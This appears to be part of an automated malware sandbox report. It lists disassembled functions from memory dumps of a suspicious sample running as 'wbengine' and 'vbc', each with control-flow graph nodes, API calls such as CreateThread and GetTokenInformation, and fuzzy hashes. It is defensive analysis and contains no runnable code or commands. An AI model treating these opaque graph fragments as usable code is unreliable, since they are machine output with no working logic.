                                                                                                                                                                      control_flow_graph 79 af8070-af817e 81 af813d-af81a5 79->81 82 af8180 79->82 97 af81bd-af81ca 81->97 98 af81a7 81->98 83 af815f 82->83 84 af8184 82->84 83->81 86 af8161 83->86 87 af818c-af8192 84->87 88 af8186 CloseHandle 84->88 90 af8163-af8170 call b27164 86->90 91 af8115-af8118 87->91 92 af8194 87->92 88->87 90->88 103 af8172 90->103 95 af8119-af811a 91->95 96 af80a7 91->96 92->91 94 af819a 92->94 100 af813c 94->100 95->96 101 af811c 95->101 107 af80f3 97->107 108 af81d0 97->108 100->84 104 af820f 101->104 103->87 105 af808e-af8096 104->105 106 af8215-af821e 104->106 105->84 105->96 106->105 116 af8224 106->116 109 af808c 107->109 110 af80f5 107->110 117 af81fe-af8201 GetTokenInformation 108->117 118 af80c3 108->118 109->105 110->109 115 af8077 110->115 119 af81d7-af81de call b2715c 115->119 116->119 120 af8226 116->120 117->104 128 af81b7 117->128 118->117 122 af80c9 118->122 130 af81e3-af81e6 119->130 120->119 123 af8228-af82ee call af5d90 120->123 126 af80ca-af80d8 GetTokenInformation 122->126 146 af830c-af831e 123->146 147 af82f0 123->147 127 af810f 126->127 133 af812d 127->133 134 af8111 127->134 128->104 132 af81b9-af81bb 128->132 130->126 142 af8089 130->142 132->97 136 af80a8 133->136 137 af8133 133->137 134->133 139 af8113 134->139 144 af80aa-af80ad 136->144 137->100 141 af81ed-af81f0 137->141 139->91 148 af80da-af80f1 141->148 149 af81f6 141->149 142->126 145 af808b 142->145 144->90 150 af80b3-af8203 144->150 145->109 151 af82a1-af82ba call af5d90 call afec00 146->151 152 af8320 146->152 147->146 153 af82f2 147->153 148->144 149->148 154 af81fc 149->154 150->90 156 af8209 150->156 151->152 157 af82f7-af82fc call af5d90 152->157 158 af8322 152->158 153->157 154->117 169 af8253-af8265 call b11280 157->169 170 af8302 157->170 158->157 161 af8324-af8326 158->161 164 af8328 161->164 172 af82df-af832b 164->172 173 af8335 164->173 169->164 182 af826b 169->182 170->169 175 af8308-af830a 170->175 172->173 179 af832d-af8331 172->179 177 af826e-af8285 173->177 175->146 180 af829b-af829d 177->180 181 af8287 177->181 179->173 180->151 183 af824c 181->183 182->177 184 af8239 182->184 183->180 185 af824e-af8252 183->185 184->164 186 af823f-af8243 184->186 185->177 186->157 186->183
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000023.00000002.2624154980.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_35_2_af0000_wbengine.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                                                                                                                                                      • Instruction ID: 4302a882a7498e268821ff00b8d004031a4bb63b379a53230e5ce71ed373f2c7
                                                                                                                                                                      • Opcode Fuzzy Hash: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                                                                                                                                                      • Instruction Fuzzy Hash: DE61313060CA4D9FC7658BE8881427A7BB0FB55350FA8035AF35AC71A0DF3CAC499356
                                                                                                                                                                      Function 00AF5910 Relevance: 1.9, APIs: 1, Instructions: 607COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 187 af5910-af5912 188 af5915-af5928 call b29970 187->188 189 af5950-af5968 187->189 196 af59b8 call b10df0 188->196 189->188 190 af596a 189->190 192 af592f 190->192 193 af5970-af597b 190->193 192->188 195 af5931-b0072c 192->195 197 af597d 193->197 198 af59d4 193->198 207 b00732-b00738 195->207 208 b00806-b00809 195->208 205 af59bd-af59c2 call af5d90 196->205 197->198 199 af597f-af5981 197->199 202 af593b-af5a15 call b111a0 198->202 203 af59d8-af59de 198->203 204 af5983-af5a38 199->204 217 af5994-af599c 203->217 223 af59e0 203->223 216 af5a3e 204->216 204->217 218 af59c7-af59ce 205->218 213 b00800 207->213 214 b0073e 207->214 221 b0079d-b007a6 208->221 213->208 220 b006b3-b006b7 213->220 214->213 222 b00744-b00774 214->222 227 af5a2c-af5a34 216->227 231 af599e-af59f7 217->231 232 af5a02 217->232 228 af5a1a-af5a26 218->228 229 af59d0 218->229 220->221 224 b006bd 220->224 225 b00791-b00793 221->225 226 b007a8 221->226 243 b006d5-b006d9 222->243 244 b0077a-b0081c 222->244 223->217 233 af59e2-af59ec 223->233 224->221 237 b006c3-b007fe 224->237 238 b007ca-b007cc 225->238 226->225 239 b007aa 226->239 240 af59d9-af59de call b22190 227->240 228->227 241 af59a1-af59b5 call af5e10 228->241 229->228 242 af59d2 229->242 231->232 232->193 235 af59ee-af59ef 233->235 236 af5a62-af5a6e 233->236 235->204 246 af59f1 235->246 251 af5a75-af5ab3 call b11280 236->251 252 af5a70 236->252 237->213 239->238 240->217 240->223 241->196 260 af5a08-af5a0b 241->260 242->240 249 b006db 243->249 250 b006df 243->250 244->221 246->188 249->250 255 b006dd 249->255 250->221 272 af5abb-af5af2 251->272 273 af5ab5 251->273 252->251 257 af5a72 252->257 255->250 261 b0c0cc 255->261 257->251 260->217 264 af5a0d 260->264 265 b0c0e8-b0c102 261->265 266 b0c0ce-b0c0d0 261->266 274 af5932 264->274 275 af5991 264->275 267 b0c0d2-b0c0df 265->267 268 b0c104 265->268 266->267 280 b0c0e7 267->280 268->267 268->280 281 af5af3 272->281 273->272 277 af5ab7-af5ab9 273->277 275->274 279 af5993 275->279 277->272 279->217 281->281
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000023.00000002.2624154980.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_35_2_af0000_wbengine.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction ID: 0ce013dd0779991b5a9cb183f368e13f282b7d9bf3265130926d065048f0899e
                                                                                                                                                                      • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction Fuzzy Hash: 7AF11930B1CE4C8FC669A76C58953F977D2EB99310F9845DEE14BC3296DD289C86C382
                                                                                                                                                                      Function 00AF5B42 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 334 af5b42-af5b47 call af5d90 336 af5b4c-af5b52 334->336 338 af5b0d 336->338 339 af5c42-af5c62 call b11280 336->339 338->339 340 af5b13 338->340 353 af5c68 339->353 354 af5c24 339->354 342 af5c8f-af5c96 340->342 344 af5c29 342->344 345 af5c98-af5c9a 342->345 347 af5c2f-af5c36 344->347 348 af5cc2-af5cc9 call af52a0 344->348 346 af5c9c 345->346 358 af5d0e-af5d18 346->358 359 af5bfa 346->359 347->348 352 af5c3c 347->352 361 af5ccb 348->361 362 af5c69 348->362 352->334 355 af5c26 354->355 356 af5c14-af5c19 354->356 355->356 360 af5c28 355->360 366 af5cc0 356->366 367 af5c20-af5c21 356->367 363 af5d1a 358->363 364 af5d54 358->364 359->358 365 af5c00 359->365 360->344 361->346 368 af5ccd 361->368 369 af5c6f 362->369 370 af5b68-af5d75 362->370 371 af5d4b-af5d52 363->371 365->356 366->348 367->353 368->346 372 af5ccf-af5cdd 368->372 369->370 375 af5c75 369->375 371->364 374 af5d45-af5d47 371->374 378 af5cdf-af5ce4 CreateThread 372->378 376 af5d5f 374->376 377 af5d49 374->377 375->342 383 af5d65 376->383 377->371 377->376 379 af5cea 378->379 380 af5c01-af5d41 378->380 379->380 381 af5cf0-af5cf6 379->381 380->371 391 af5d43 380->391 381->367 384 af5cff-af5d01 381->384 383->383 385 af5d07 384->385 386 af5bb4 384->386 385->386 389 af5d0d 385->389 388 af5cda-af5cdd 386->388 388->378 391->364
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000023.00000002.2624154980.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_35_2_af0000_wbengine.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction ID: 0ea1b1d3666e5d3962ef83757e63ab52d24b1d9a5434bee42b9a8a07eec59723
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction Fuzzy Hash: A621E030E0DF4D8FCB699BF884487742BF1AB55310F6901A6B347CF2A2DA24CC869356
                                                                                                                                                                      Function 00AF5B09 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 392 af5b09-af5b3b 396 af5cff-af5d01 392->396 397 af5d07 396->397 398 af5bb4-af5ce4 CreateThread 396->398 397->398 400 af5d0d 397->400 402 af5cea 398->402 403 af5c01-af5d41 398->403 402->403 404 af5cf0-af5cf6 402->404 410 af5d4b-af5d52 403->410 411 af5d43 403->411 404->396 406 af5c20-af5c68 404->406 412 af5d54 410->412 413 af5d45-af5d47 410->413 411->412 414 af5d5f 413->414 415 af5d49 413->415 416 af5d65 414->416 415->410 415->414 416->416
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000023.00000002.2624154980.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_35_2_af0000_wbengine.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction ID: 950dbc865154bff8231ed1eda9c072857f01271fa159ad2ec6205f7568985991
                                                                                                                                                                      • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction Fuzzy Hash: 7A019630D0EF4E8FDB6597F48C1437577E0AB50324F25019BF787CA095EA644902A752
                                                                                                                                                                      Function 00AF5B87 Relevance: 1.5, APIs: 1, Instructions: 23threadCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 417 af5b87-af5b99 CreateThread 420 af5cff-af5d01 417->420 421 af5d07 420->421 422 af5bb4-af5ce4 CreateThread 420->422 421->422 424 af5d0d 421->424 426 af5cea 422->426 427 af5c01-af5d41 422->427 426->427 428 af5cf0-af5cf6 426->428 434 af5d4b-af5d52 427->434 435 af5d43 427->435 428->420 430 af5c20-af5c68 428->430 436 af5d54 434->436 437 af5d45-af5d47 434->437 435->436 438 af5d5f 437->438 439 af5d49 437->439 440 af5d65 438->440 439->434 439->438 440->440
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000023.00000002.2624154980.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_35_2_af0000_wbengine.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                      • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction ID: bc81f6a44b8d6bd1e36021e0f6cbd9ba13e2d345395d5a5f7ea2109490dd713b
                                                                                                                                                                      • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction Fuzzy Hash: 81E08630A0DF4C4FDB599B7498103393AE5FB88314F1501CED64AD71D1EF6909064792
                                                                                                                                                                      Function 00AF599B Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 441 af599b-af599e 442 af59f7 441->442 443 af5a02 442->443 445 af597d 443->445 446 af59d4 443->446 445->446 447 af597f-af5981 445->447 448 af593b-af5a15 call b111a0 446->448 449 af59d8-af59de 446->449 450 af5983-af5a38 447->450 456 af5994-af599c 449->456 458 af59e0 449->458 455 af5a3e 450->455 450->456 459 af5a2c-af5a34 455->459 456->443 460 af599e 456->460 458->456 461 af59e2-af59ec 458->461 464 af59d9-af59de call b22190 459->464 460->442 462 af59ee-af59ef 461->462 463 af5a62-af5a6e 461->463 462->450 465 af59f1 call b29970 462->465 466 af5a75-af5ab3 call b11280 463->466 467 af5a70 463->467 464->456 464->458 478 af59b8 call b10df0 465->478 479 af5abb-af5af2 466->479 480 af5ab5 466->480 467->466 470 af5a72 467->470 470->466 483 af59bd-af59c2 call af5d90 478->483 487 af5af3 479->487 480->479 482 af5ab7-af5ab9 480->482 482->479 486 af59c7-af59ce 483->486 488 af5a1a-af5a26 486->488 489 af59d0 486->489 487->487 488->459 490 af59a1-af59b5 call af5e10 488->490 489->488 491 af59d2 489->491 490->478 494 af5a08-af5a0b 490->494 491->464 494->456 495 af5a0d 494->495 497 af5932 495->497 498 af5991 495->498 498->497 499 af5993 498->499 499->456
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000023.00000002.2624154980.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_35_2_af0000_wbengine.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1284135714-0
                                                                                                                                                                      • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction ID: e8ec47810cc1d9345c5b4f160e46f6ec77c4e807e78d5e972b9b8e9b359d5a0f
                                                                                                                                                                      • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction Fuzzy Hash: C601D670E1DE9CCFD61EA7F854C927969A1BB94360F68059BB38EC7092D9A44D00DB41
                                                                                                                                                                      Function 00AF8090 Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 500 af8090-af8096 501 af8184 500->501 502 af818c-af8192 501->502 503 af8186 CloseHandle 501->503 504 af8115-af8118 502->504 505 af8194 502->505 503->502 507 af8119-af811a 504->507 508 af80a7 504->508 505->504 506 af819a 505->506 509 af813c 506->509 507->508 510 af811c 507->510 509->501 511 af820f 510->511 512 af808e-af8096 511->512 513 af8215-af821e 511->513 512->501 512->508 513->512 515 af8224 513->515 516 af81d7-af81e6 call b2715c 515->516 517 af8226 515->517 526 af80ca-af810f GetTokenInformation 516->526 527 af8089 516->527 517->516 518 af8228-af82ee call af5d90 517->518 531 af830c-af831e 518->531 532 af82f0 518->532 535 af812d 526->535 536 af8111 526->536 527->526 530 af808b 527->530 542 af808c 530->542 533 af82a1-af82ba call af5d90 call afec00 531->533 534 af8320 531->534 532->531 537 af82f2 532->537 533->534 540 af82f7-af82fc call af5d90 534->540 541 af8322 534->541 538 af80a8 535->538 539 af8133 535->539 536->535 543 af8113 536->543 537->540 547 af80aa-af80ad 538->547 539->509 545 af81ed-af81f0 539->545 561 af8253-af8265 call b11280 540->561 562 af8302 540->562 541->540 546 af8324-af8326 541->546 542->512 543->504 551 af80da-af80f1 545->551 552 af81f6 545->552 550 af8328 546->550 553 af8163-af8170 call b27164 547->553 554 af80b3-af8203 547->554 564 af82df-af832b 550->564 565 af8335 550->565 551->547 552->551 559 af81fc 552->559 553->503 574 af8172 553->574 554->553 566 af8209 554->566 570 af81fe-af8201 GetTokenInformation 559->570 561->550 581 af826b 561->581 562->561 571 af8308-af830a 562->571 564->565 578 af832d-af8331 564->578 573 af826e-af8285 565->573 570->511 583 af81b7 570->583 571->531 579 af829b-af829d 573->579 580 af8287 573->580 574->502 578->565 579->533 584 af824c 580->584 581->573 585 af8239 581->585 583->511 586 af81b9-af81ca 583->586 584->579 587 af824e-af8252 584->587 585->550 588 af823f-af8243 585->588 591 af80f3 586->591 592 af81d0 586->592 587->573 588->540 588->584 591->542 593 af80f5 591->593 592->570 598 af80c3 592->598 593->542 597 af8077 593->597 597->516 598->570 599 af80c9 598->599 599->526
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000023.00000002.2624154980.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_35_2_af0000_wbengine.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction ID: 316aa7c0016b23a6cc6b9bbb7f50e317cbf25473d3819bcfff1fcd0cf612d890
                                                                                                                                                                      • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction Fuzzy Hash: B0C08C70128C0EA7533803C80C0B0B0A6248202B90B0C0306FE06C0230EE0C8E03009F
                                                                                                                                                                      Function 00AF817F Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 600 af817f 601 af8184 600->601 602 af818c-af8192 601->602 603 af8186 CloseHandle 601->603 604 af8115-af8118 602->604 605 af8194 602->605 603->602 607 af8119-af811a 604->607 608 af80a7 604->608 605->604 606 af819a 605->606 609 af813c 606->609 607->608 610 af811c 607->610 609->601 611 af820f 610->611 612 af808e-af8096 611->612 613 af8215-af821e 611->613 612->601 612->608 613->612 615 af8224 613->615 616 af81d7-af81e6 call b2715c 615->616 617 af8226 615->617 626 af80ca-af810f GetTokenInformation 616->626 627 af8089 616->627 617->616 618 af8228-af82ee call af5d90 617->618 631 af830c-af831e 618->631 632 af82f0 618->632 635 af812d 626->635 636 af8111 626->636 627->626 630 af808b 627->630 642 af808c 630->642 633 af82a1-af82ba call af5d90 call afec00 631->633 634 af8320 631->634 632->631 637 af82f2 632->637 633->634 640 af82f7-af82fc call af5d90 634->640 641 af8322 634->641 638 af80a8 635->638 639 af8133 635->639 636->635 643 af8113 636->643 637->640 647 af80aa-af80ad 638->647 639->609 645 af81ed-af81f0 639->645 661 af8253-af8265 call b11280 640->661 662 af8302 640->662 641->640 646 af8324-af8326 641->646 642->612 643->604 651 af80da-af80f1 645->651 652 af81f6 645->652 650 af8328 646->650 653 af8163-af8170 call b27164 647->653 654 af80b3-af8203 647->654 664 af82df-af832b 650->664 665 af8335 650->665 651->647 652->651 659 af81fc 652->659 653->603 674 af8172 653->674 654->653 666 af8209 654->666 670 af81fe-af8201 GetTokenInformation 659->670 661->650 681 af826b 661->681 662->661 671 af8308-af830a 662->671 664->665 678 af832d-af8331 664->678 673 af826e-af8285 665->673 670->611 683 af81b7 670->683 671->631 679 af829b-af829d 673->679 680 af8287 673->680 674->602 678->665 679->633 684 af824c 680->684 681->673 685 af8239 681->685 683->611 686 af81b9-af81ca 683->686 684->679 687 af824e-af8252 684->687 685->650 688 af823f-af8243 685->688 691 af80f3 686->691 692 af81d0 686->692 687->673 688->640 688->684 691->642 693 af80f5 691->693 692->670 698 af80c3 692->698 693->642 697 af8077 693->697 697->616 698->670 699 af80c9 698->699 699->626
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000023.00000002.2624154980.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_35_2_af0000_wbengine.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction ID: 8dcaae30b613d6a80f4d79af520d4b4670bafa5a90852e1e36fe3f391379409a
                                                                                                                                                                      • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction Fuzzy Hash: 86C092B455890D97533827C82C0B4B2B5684613BA0F0C4712FF1A9A370EE5C4D4341AB

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 004019F0 Relevance: 100.5, APIs: 10, Strings: 47, Instructions: 747comCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f call 40ad88 call 40ad82 0->6 12 401dc3-401ed4 CloseHandle call 401650 call 40b84d call 40af66 6->12 13 401c55-401c6c call 401650 6->13 51 401ed6-401eed call 40ba30 12->51 52 401eef 12->52 17 401c73-401c77 13->17 19 401c93-401c95 17->19 20 401c79-401c7b 17->20 24 401c98-401c9a 19->24 22 401c7d-401c83 20->22 23 401c8f-401c91 20->23 22->19 25 401c85-401c8d 22->25 23->24 27 401cb0-401cce call 401650 24->27 28 401c9c-401caf 24->28 25->17 25->23 33 401cd0-401cd4 27->33 35 401cf0-401cf2 33->35 36 401cd6-401cd8 33->36 39 401cf5-401cf7 35->39 37 401cda-401ce0 36->37 38 401cec-401cee 36->38 37->35 40 401ce2-401cea 37->40 38->39 39->28 41 401cf9-401d09 call 40ad7c 39->41 40->33 40->38 41->12 47 401d0f 41->47 50 401d10-401d2e call 401650 47->50 59 401d30-401d34 50->59 55 401ef3-401f1a call 401300 51->55 52->55 70 401f1c-401f2f 55->70 71 401f5f-401f69 55->71 61 401d50-401d52 59->61 62 401d36-401d38 59->62 63 401d55-401d57 61->63 64 401d3a-401d40 62->64 65 401d4c-401d4e 62->65 63->28 66 401d5d-401d7b call 401650 63->66 64->61 68 401d42-401d4a 64->68 65->63 78 401d80-401d84 66->78 68->59 68->65 73 401f33-401f5d call 401560 70->73 74 401f73-401f75 71->74 75 401f6b-401f72 71->75 73->71 76 401f92-4021a4 call 40ba30 call 40b84d call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 74->76 77 401f77-401f8d call 401560 74->77 75->74 76->5 106 4021aa-4021c0 76->106 77->76 82 401da0-401da2 78->82 83 401d86-401d88 78->83 88 401da5-401da7 82->88 86 401d8a-401d90 83->86 87 401d9c-401d9e 83->87 86->82 89 401d92-401d9a 86->89 87->88 88->28 90 401dad-401dbd call 40ad7c 88->90 89->78 89->87 90->12 90->50 108 4021c6-4021ca 106->108 109 40246a-402470 106->109 108->109 112 4021d0-402217 call 4018f0 108->112 110 402472-402475 109->110 111 40247a-402480 109->111 110->111 111->5 113 402482-402487 111->113 117 40221d-40223d 112->117 118 40244f-40245f 112->118 113->5 117->118 122 402243-402251 117->122 118->109 119 402461-402467 call 40b6b5 118->119 119->109 122->118 125 402257-4022b7 call 401870 * 2 call 4018d0 122->125 135 4022c3-40232a call 4018d0 call 40b350 125->135 136 4022b9-4022be call 40ad90 125->136 146 402336-40234d call 4018d0 135->146 147 40232c-402331 call 40ad90 135->147 136->135 184 40234e call 730d007 146->184 185 40234e call 730d01d 146->185 147->146 151 402350-402352 152 402354-402355 SafeArrayDestroy 151->152 153 40235b-402361 151->153 152->153 154 402363-402368 call 40ad90 153->154 155 40236d-402375 153->155 154->155 157 402377-402379 155->157 158 40237b 155->158 159 40237d-40238f call 4018d0 157->159 158->159 182 402390 call 730d007 159->182 183 402390 call 730d01d 159->183 162 402392-4023a2 164 4023a4-4023a9 call 40ad90 162->164 165 4023ae-4023b4 162->165 164->165 167 4023b6-4023b8 165->167 168 4023ba 165->168 169 4023bc-4023fe 167->169 168->169 180 402401 call 730d007 169->180 181 402401 call 730d01d 169->181 170 402403-40242c call 4019a0 175 402436-402445 call 4019a0 170->175 176 40242e-402433 170->176 175->118 179 402447-40244c 175->179 176->175 179->118 180->170 181->170 182->162 183->162 184->151 185->151
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2612727730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000422000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000442000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000444000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000459000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_400000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandleInitialize_getenv_malloc_memset
